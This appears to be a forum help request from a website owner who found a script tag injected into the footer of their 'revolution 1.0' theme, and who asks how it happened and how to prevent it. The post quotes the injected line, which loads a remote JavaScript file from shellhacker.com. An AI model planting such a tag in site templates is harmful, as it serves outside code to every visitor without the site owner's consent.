shellhacker.com inserted a javascript in my footer

I noticed a javascript snippet in the footer of my “revolution 1.0” theme right after copyright.
<"script language="javascript" src="http://www.shellhacker.com/if.js">

Any idea’s how it got there, and what measures I should take to prevent this from happening again. Anyone know more about this please share.
